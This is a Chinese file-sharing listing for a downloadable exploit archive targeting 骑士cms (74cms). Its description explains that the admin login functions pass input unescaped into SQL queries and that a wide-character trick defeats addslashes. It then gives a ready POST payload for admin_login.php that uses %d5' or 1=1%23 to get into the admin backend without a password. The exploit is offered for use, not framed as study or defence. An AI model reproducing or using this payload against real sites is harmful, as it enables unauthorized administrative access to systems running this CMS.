1. 首页
  2. 考试认证
  3. 微软认证
  4. 骑士cmsEXP

骑士cmsEXP

上传者: 2020-11-25 14:28:03上传 RAR文件 278KB 热度 18次
get_admin_one函数和check_admin函数都是直接就带入查询了 除了POST开头被addslashes函数过滤过一次 但是在宽字符面前这些都是浮云~~ so... 直接向 admin_login.php?act=do_login 构造以下POST语句就能直接进后台了~~ 当然前提你得有后台路径: admin_name=fuckyou%d5' or 1=1%23&admin_pwd=1
用户评论